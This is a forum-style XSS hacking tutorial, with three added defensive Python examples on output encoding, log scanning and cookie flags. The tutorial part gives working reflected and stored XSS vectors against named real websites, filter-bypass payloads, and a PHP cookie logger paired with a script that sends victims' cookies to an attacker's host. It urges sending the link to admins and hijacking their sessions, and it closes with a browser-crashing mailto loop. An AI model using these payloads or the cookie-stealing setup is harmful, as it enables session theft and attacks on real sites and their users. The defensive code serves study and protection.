XSS Persistent with Details
What is XSS?
XSS (also written CSS in some older texts, not to be confused with Cascading Style Sheets) stands for Cross Site
Scripting. It is a vulnerability that lets an attacker inject client-side
script into web pages viewed by other users. With it, we can execute
JavaScript in the victim's browser. JavaScript is very powerful, and I
highly recommend you learn it first before attempting XSS; you will
understand everything better. By injecting malicious scripts, we can
gain access to sensitive page content, such as the cookies that the
browser keeps for that site. Therefore, we can hijack
sessions.
==============================================
What types of XSS exist?
==============================================
Non Persistent
====================
Non persistent is also known as Reflected XSS. When we
execute it, it doesn't stay in the page: the script is only reflected back
in the response to one request. In order for it to have any
effect, we must send the link to the vulnerable page, and our malicious
vector has to be in that link. How does reflected XSS work? Simple. Web
pages are designed to take input from users. For example, when you
search in some search bar, the page will say "No results for" followed by your input.
Here it reflects what you typed. There are a lot of
places where a page might reflect our input. You are supposed to view the
page source, find where your input lands, escape their tags, and open your own.
==============================================
Persistent XSS
====================
An XSS vulnerability is persistent (also called stored) if your malicious
script stays on the site where you submitted it. For example, if HF had an
XSS vulnerability in threads and I put a malicious vector in the thread
name, everyone who opens this thread would be affected. It stays there
as long as the content does. That's why it is called persistent. The attacker doesn't have to
include his vector in the URL he sends to the victim.
==============================================
DOM Based XSS
====================
DOM-based vulnerabilities occur in the content-processing
stages performed by the client: the page's own JavaScript reads
attacker-controlled data (part of the URL, for example) and writes it into
the page. The name refers to the browser's representation of HTML or XML
content, which is called the Document Object Model (therefore, we get DOM).
==============================================
XSS
====================
When searching for an XSS vulnerability, your main
objective is to get the page to open an alert box. To do that you often
have to break out of the HTML tags surrounding your input. Your base script is:
<script>alert("XSS")</script>
Every time you test for XSS, you are supposed to type that.
Then you must look at the source code, see where it reflects our vector,
escape their tags, and an alert saying "XSS" will be created. You should
switch to Firefox when searching for XSS vulnerabilities because Chrome
has additional filters (its built-in reflected-XSS filter) that block simple reflected vectors.
For the first example, we will take
http://www.osby.se/.
Type <script>alert(0)</script>
into the site's search box. Nothing happens. Right click
on the page > View Page Source. Press Ctrl+F and search for "alert(0)"
to see where the page reflects our vector.
This is what I got:
<form action="http://www.osby.se/soksida/?q=%3cscript%3ealert(0)%3c/script%3e" method="post" class="search">
<div>
<label class="structural" for="searchquery">Sök på webbplatsen...</label>
<input class="text" type="text" name="searchquery" value="<script>alert(0)</script>" />
<input type="submit" class="button" value="Sök" />
</div>
</form>
Our input is reflected in two places: inside the input tag,
under value="", and inside the form's action attribute. Now let's take a look at what the
page does. Let's look at <form action> first. It puts a quotation
mark, then the link to the search page, and then our content. At the end it
finishes by putting another quotation mark. So, action equals
everything between the quotation marks. Meaning, if we type our own
quotation mark in the search bar, the page will think that action=""
finishes there, and our <script>alert(0)</script> will land
outside of it.
Now let's look at the input tag. Our script is reflected under value="".
This is the same situation: it took our input and put a
quotation mark before and after it. If we place our own quotation mark,
the browser will think that value ends there. I'll explain with an example. Normally it looks like this:
value="Is this vulnerable?"
Now let's type this in the search bar:
Is " this vulnerable?
The source will now look like this:
value="Is " this vulnerable?"
"this vulnerable?" is now OUTSIDE of value, meaning that we have successfully escaped it.
Let's get back to the osby site and exploit the
vulnerability. Type "<script>alert(0)</script> in the search
bar, and it will execute and create an alert box. The source now looks like this:
<form action="http://www.osby.se/soksida/?q="><script>alert(0)</script>" method="post" class="search">
<div>
<label class="structural" for="searchquery">Sök på webbplatsen...</label>
<input class="text" type="text" name="searchquery" value="" /><script>alert(0)</script>" />
<input type="submit" class="button" value="Sök" />
</div>
</form>
We tricked the page into thinking that value had ended, so our script was written outside the attribute.
Now let's take the popular shopping site Toronto as an
example. Type <script>alert("XSS")</script> into the main
search box and look at the source. It reflects our input in a lot of
places, but I will post only one:
<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId': 'pub-6986100390200519',
'query': '<SCRIPT>alert("XSS")</SCRIPT>'
This doesn't do anything by itself. But if we take a closer look,
we will see that we are inside a script tag, within a JavaScript string. What we can do is close
that tag with </script> and open a new one for ourselves.
The source will then look like this:
<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId': 'pub-6986100390200519',
'query': '</SCRIPT><SCRIPT>alert("XSS")</SCRIPT>'
It closed their tag and opened our own. An alert box will pop up saying XSS.
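The three reflections above (the "No results for" text, the quoted value="" attribute on osby.se, and the JavaScript string inside the Toronto page's <script> block) fail for the same reason: the page writes user input into HTML without encoding it for the context it lands in. The following is an added example, not code from the original post or from any of the sites mentioned. It uses a hypothetical search template that reflects the query into all three sinks, first unencoded and then with context-specific encoding, and uses Python's HTMLParser (which, like a browser, treats everything after <script> as raw text until a real </script>) to count how many script elements each version ends up with. Note that inside a script block HTML entities are never decoded, so html.escape does nothing there and a JSON string with "</" broken up is used instead.

```python
import html
import json
from html.parser import HTMLParser

# Constructed payloads modelled on the three vectors from the walkthrough:
# one that lands in element text, one that closes a double-quoted
# attribute, and one that closes a <script> block from inside a JS string.
TEXT_PAYLOAD = '<script>alert(0)</script>'
ATTR_PAYLOAD = '"><script>alert(0)</script>'
SCRIPT_PAYLOAD = '</SCRIPT><SCRIPT>alert("XSS")</SCRIPT>'


def render_vulnerable(query: str) -> str:
    """Reflect the search term into three sinks with no encoding, the way
    the pages above do. (Hypothetical template, not any real site's code.)"""
    return (
        f'<p>No results for {query}</p>\n'
        f'<input type="text" name="q" value="{query}" />\n'
        f"<script>var pageOptions = {{ 'query': '{query}' }};</script>"
    )


def encode_for_html_text(value: str) -> str:
    # In element text, turning & < > into entities is enough.
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    # quote=True also converts " and ' so the value can never end the
    # attribute it sits in, whichever quote character the template used.
    return html.escape(value, quote=True)


def encode_for_script_literal(value: str) -> str:
    # Inside <script> the HTML parser does not decode entities, so
    # html.escape is useless there; the block only ends at a literal
    # "</script". Emit a JSON string (quotes and backslashes escaped,
    # non-ASCII as \uXXXX) and break up "</" so the literal cannot close
    # the block.
    return json.dumps(value).replace("</", "<\\/")


def render_hardened(query: str) -> str:
    """Same template, each sink encoded for the context it lands in."""
    return (
        f'<p>No results for {encode_for_html_text(query)}</p>\n'
        f'<input type="text" name="q" value="{encode_for_html_attribute(query)}" />\n'
        f"<script>var pageOptions = {{ 'query': {encode_for_script_literal(query)} }};</script>"
    )


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags. HTMLParser switches to raw-text mode after
    <script> and only leaves it at a real </script>, so it judges the
    payloads much as a browser tokenizer would."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def injected_script_count(rendered: str) -> int:
    """Number of <script> elements beyond the single one the template emits."""
    parser = _ScriptCounter()
    parser.feed(rendered)
    parser.close()
    return parser.script_tags - 1


if __name__ == "__main__":
    for payload in (TEXT_PAYLOAD, ATTR_PAYLOAD, SCRIPT_PAYLOAD):
        print(repr(payload),
              "vulnerable:", injected_script_count(render_vulnerable(payload)),
              "hardened:", injected_script_count(render_hardened(payload)))
```

Running it shows at least one extra script element for every payload against the unencoded template and zero against the hardened one. The point for a developer is that one escaping function is not enough: the encoder has to match the sink (text, attribute, or script literal), which is exactly what the quote and </script> tricks above exploit when it does not.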
When doing reflected XSS, you must always keep an eye
on the URL. Why? Because sometimes you can inject your vector through the
URL, if the page reflects a parameter from it. This means you should sometimes
paste your vector right after an "=" in the query string, and you might get an
alert box.
Let's take the site Prva.rs for example. While browsing it,
I found an archive with options to show content by day, month
and year:
http://www.prva.rs/sr/vesti/video.html?day=&month=3&year=2012&Submit=
So let's inject our vector, here <script>alert("-Divine-")</script>, into the day parameter of the URL. Let's look at the source and search for it:
<li><a
href="/sr/vesti/video.html?month=3&year=2012&day=<script>alert("-Divine-")</script>&position=1">2</a></li>
As we can see, the href started with ", meaning that we
should close it with our own quotation mark. But after doing just that
it still won't work. Upon inspecting the source code further, I found out
that we were already inside a script tag, meaning that we must close that
as well. The final vector is:
"</SCRIPT><SCRIPT>alert("-Divine-")</SCRIPT>
This closes their quotation mark, then closes the script tag, and opens our own.
<li><a
href="/sr/vesti/video.html?month=3&year=2012&day="</SCRIPT><SCRIPT>alert("-Divine-")</SCRIPT>&position=1">2</a></li>
We made it close the href, then close the script, and then open another one with our code.
Filters
We have now learned the basics. But ", <> and the words
"script" and "alert" will not always be allowed. There are many things
used to stop us from injecting our vector. I will explain the filters you
will face and how you can bypass them.
Magic Quotes
When magic_quotes_gpc is on, the server does not let the characters ", / and ' through unchanged (quotes get a backslash put in front of them), so a payload that depends on them breaks.
To bypass it we use:
String.fromCharCode()
We write our text inside the () as decimal ASCII character codes,
for example:
String.fromCharCode(88,83,83)
88, 83, 83 are the ASCII codes for "XSS".
And we use it like this: <script>alert(String.fromCharCode(88,83,83))</script>
Let's take http://www.osby.se as an example again. In the
beginning of the thread we exploited the vulnerability using
"<script>alert(0)</script>
Notice how I intentionally used 0 instead of the word
"XSS". If we just try to change that 0 to some text, "XSS" for example,
it won't create an alert box. Why? Because the page doesn't allow quotation
marks. To bypass that we use:
"<script>alert(String.fromCharCode(88,83,83))</script>
We will get an alert box saying XSS.
We can also bypass it in another way, by using / instead of ".
<script>alert(/XSS/)</script> will execute, but since /XSS/ is a regular expression literal, the alert box will show the slashes: /XSS/.
Bypassing with Full HTTP
You can sometimes bypass some filters by encoding your
vector in "full HTTP" (percent-encoding every character of it). You can use the tool "Coder" to encode it
that way.
Word Blocking
Sometimes pages won't allow words like "script" to appear
in the input. When this happens, you need another way to
get an alert box. Learn JavaScript if you want to understand this better.
Let's take the site http://www.frageugen.at/index.php?page= for example:
http://www.frageugen.at/index.php?page=<script>alert(0)</script>
The source will look like this:
<strong><script>alert(0)<Controller</strong> not found!</td
As you can see, it stripped our </script>. We can
bypass this by using a different type of vector. We will use an <Iframe>
to execute our script. Type <Iframe src='javascript:alert(0)'> in
the URL and an alert box will pop up.
Sometimes this type of filtering can be bypassed by
changing the case of some letters inside the word, for example
</ScRIpT>.
Filtration of <>
When this happens we can't open our own tag. This
usually happens inside an <input>. When this is the case, we use
event handler attributes such as onclick, onmouseover, etc.
Let's take this site for example:
http://store.acmilan.com/en/frontend/homepage/search?keywords=
Type <script>alert(0)</script> and look at the source:
<input type='text' id='q' class='input' name='keywords' value='<script>alert(0)</script>' />
To bypass this, we must first escape value. This
time the delimiter isn't ", it is only '. Look at the source code. Then we
add an onmouseover attribute and make it run JavaScript:
onmouseover='javascript:alert(0)'
Every time a user hovers the mouse over the search bar, the alert will open.
The final vector looks like:
' onmouseover='javascript:alert(0)'
Hover your mouse over the search bar and the alert will pop up.
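The bypasses in this Filters section (String.fromCharCode in place of quotes, percent-encoding, mixed case like </ScRIpT>, an <Iframe src='javascript:...'> instead of <script>, and event handler attributes) all defeat filters that match raw input against a word list. The following is an added example from the detection side, not code from the original post: a small scanner that normalizes request targets from constructed access-log lines the way a WAF or log pipeline should (repeated percent-decoding, expanding String.fromCharCode(...) to the text it produces, case folding) before matching a short indicator list. The log lines, IP addresses and paths are constructed for the example; the indicator list is a coarse triage heuristic, not a filter to rely on in place of output encoding.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The query strings are
# the vectors discussed in the Filters section, as they would appear in a log.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Mar/2012:10:00:01 +0000] "GET /soksida/?q=%22%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.6 - - [10/Mar/2012:10:00:02 +0000] "GET /index.php?page=%3CIframe%20src=%27javascript:alert(0)%27%3E HTTP/1.1" 200 318',
    '203.0.113.7 - - [10/Mar/2012:10:00:03 +0000] "GET /search?keywords=%27%20onmouseover=%27javascript:alert(0)%27 HTTP/1.1" 200 701',
    '203.0.113.8 - - [10/Mar/2012:10:00:04 +0000] "GET /index.php?page=%3C/ScRIpT%3E%3CsCrIpT%3Ealert(0)%3C/script%3E HTTP/1.1" 200 318',
    '203.0.113.9 - - [10/Mar/2012:10:00:05 +0000] "GET /search?keywords=red+shoes+size+42 HTTP/1.1" 200 2048',
]

# Pull the request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# String.fromCharCode(88,83,83) and friends, any capitalisation.
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d\s,]+)\)', re.I)


def normalize(raw: str) -> str:
    """Undo the encodings the bypasses rely on before matching anything."""
    s = raw
    # Percent-decode until stable: double encoding is a common way past a single decode.
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded

    # Resolve String.fromCharCode(88,83,83) to the text it would produce ("XSS").
    def expand(match: re.Match) -> str:
        codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
        return "".join(chr(c) for c in codes if 0 <= c < 0x110000)

    s = FROMCHARCODE_RE.sub(expand, s)
    # Mixed case such as </ScRIpT> collapses under case folding.
    return s.lower()


# Coarse indicators, applied to the normalized target only.
XSS_INDICATORS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b")),
    ("javascript_uri", re.compile(r"javascript\s*:")),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=")),
    ("frame_tag", re.compile(r"<\s*iframe\b")),
]


def classify_request(target: str) -> list[str]:
    """Return the names of the indicators the (normalized) request target trips."""
    norm = normalize(target)
    return [name for name, rx in XSS_INDICATORS if rx.search(norm)]


def scan_log(lines) -> list[tuple[str, list[str]]]:
    """Return (request_target, indicators) for every line that trips an indicator."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        indicators = classify_request(match.group(1))
        if indicators:
            hits.append((match.group(1), indicators))
    return hits


if __name__ == "__main__":
    for target, indicators in scan_log(SAMPLE_LOG_LINES):
        print(indicators, target)
```

Four of the five constructed lines are flagged; the ordinary "red shoes" search is not. Without the normalization step the fromCharCode and mixed-case lines would slip past a plain string match, which is the same weakness the page exploits in the filters it describes.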
Persistent XSS
Persistent XSS stays on the site, and therefore many
more users may encounter it. It is more dangerous. Let's take the site
Fandom.com for example. Register there, and go to submit fan art. Use your
vector in the name of the picture and in the description.
Escape all filters and tags to make the alert box pop up.
Then upload your picture. Everyone who views that picture will have the
alert pop up. But this is even better! The site has a "Most recent Fan
Art" section on the home page, meaning that all recent fan art and its name
will be listed on the main page. Therefore, EVERYONE will see the pop
up. Pretty cool, right?
Persistent XSS is rarer and more difficult to find than
reflected XSS. But that doesn't mean it can't be
found on huge sites like Google. Here's a persistent XSS my team,
Antagonism, and I found in Google:
http://www.google.com/ig/directory?url=freecamshows.x90x.net/user.xml
How did we do it? Google has a page where users can
submit their own gadgets. Users must code them in XML, upload them
somewhere else, and then click "add a new gadget" from that URL. I HAVE
ALREADY CONTACTED GOOGLE ABOUT THIS; IT ISN'T DANGEROUS BECAUSE THAT
PART OF GOOGLE IS ISOLATED AND SANDBOXED.
DOM Based XSS
Let's take http://xss-quiz.int21h.jp/stage-3.php?sid=070592ea16c753e30346544e24b9ae0c64d7f8aa for example. This is stage #3.
Install the Firefox add-on called "Tamper Data". Now type
<script>alert(document.domain);</script> in the search box.
Nothing will happen. Start the Tamper Data add-on and click "Start Tamper".
Now type <script>alert(document.domain);</script> in the
search bar again. Tamper Data will ask you if you want to tamper; click
the "Tamper" button. Now, on the right side of the screen, paste your vector
into every one of the request fields that show up, and then press Enter. The page
will load, and the JavaScript will be executed.
What Can I Do With XSS?
Cookie stealing:
Right click on the desktop and create a new file. Paste this code into that file:
[code]
<?php
// Read the value of the "cookie" parameter (the vector below sends ?cookie=...)
$cookie = urldecode($_GET['cookie']);
// Append it, with the visitor's IP address and a timestamp, to CookieLog.txt
$fp = fopen("CookieLog.txt", "a");
$cookie = $cookie . ": " . $_SERVER['REMOTE_ADDR'] . " at " . date("r", time()) . "\n";
fwrite($fp, $cookie);
fclose($fp);
// Send the visitor on to another page
header("Location: http://google.com");
?>
[/code]
Now click File > Save As > CLogger.php.
It's very important to save it as .php.
Then make another new text file. Let it remain empty
for now, and name it "CookieLog.txt". Now go make an account at x90x.net.
Find the file manager and click upload. Upload both of these files. Then
select both of them and click chmod. Change the mode to '777'.
That's it. When you want to steal someone's cookies, use this vector:
<script>document.location="http://www.mysite/CLogger.php?cookie=" + document.cookie;</script>
Send the link to someone. Sending it to an admin would be
the best-case scenario. If he clicks it, your text file will be updated with
his cookie. Then you can use the Firefox add-on "Cookie Manager" to inject
the cookie into your browser and hijack his session.
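The vector above works only because document.cookie hands the session cookie to page script. From the defender's side, the browser will not expose a cookie to script at all if the server sets it with the HttpOnly attribute, which is why that flag (together with Secure) is the standard hardening for session cookies. The following is an added example, not code from the original post: it parses Set-Cookie headers, reports which cookie names document.cookie would still expose, audits each header for missing attributes, and builds a hardened header. The sample headers and values are constructed (PHPSESSID is PHP's default session cookie name; the others are made up for the example). SameSite is included in the audit because a session cookie should carry it, but it limits cross-site sending rather than script access.

```python
# Constructed Set-Cookie headers as a response might carry them.
SAMPLE_SET_COOKIE_HEADERS = [
    "PHPSESSID=8f3a1c2e9d; Path=/",
    "prefs=lang%3Den; Path=/; Max-Age=31536000",
    "csrf_token=2b7f1e; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def parse_set_cookie(header_value: str):
    """Split one Set-Cookie value into (name, value, {attribute_lower: attribute_value}).
    Flag attributes such as Secure and HttpOnly get an empty string as their value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def script_visible_cookies(set_cookie_headers) -> list[str]:
    """Names of cookies that document.cookie would expose to page script, i.e.
    every cookie the server did not mark HttpOnly. This is exactly what the
    cookie-stealing vector above would be able to send off the page."""
    visible = []
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            visible.append(name)
    return visible


def audit_set_cookie(header_value: str) -> list[str]:
    """Return the hardening attributes a Set-Cookie header is missing."""
    _, _, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("HttpOnly")   # without it, script can read the cookie
    if "secure" not in attrs:
        findings.append("Secure")     # without it, the cookie also travels over plain HTTP
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite")   # limits cross-site sending; not an XSS control by itself
    return findings


def hardened_set_cookie(name: str, value: str, max_age: int = 3600) -> str:
    """Build a Set-Cookie value with the attributes a session cookie should carry."""
    return f"{name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print("readable by script:", script_visible_cookies(SAMPLE_SET_COOKIE_HEADERS))
    for header in SAMPLE_SET_COOKIE_HEADERS:
        print(header.split(";")[0], "missing:", audit_set_cookie(header))
    print(hardened_set_cookie("PHPSESSID", "8f3a1c2e9d"))
```

With the sample headers, PHPSESSID and prefs are readable by script and the session cookie is flagged for all three attributes; the hardened header audits clean and is not visible to document.cookie. HttpOnly does not fix the XSS itself (the injected script can still act on the page as the user), but it removes the session-theft outcome the tutorial is after.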
XSS Worm
Imagine how great it would be if you could create a
worm that would make users PM everyone on their friend list with your
cookie-stealing vector. You would have hundreds, if not thousands, of
clicks in a few minutes.
I'm not going to cover this, because it would take too much time and space. So read this tutorial written by AntiPaste.
XSS Crash - By Mario
Use this vector:
<script>var x=120;while(x>0){document.location="mailto:";x--;}</script>
It will open a large number of Microsoft Office Outlook windows to send emails. This will crash the PC.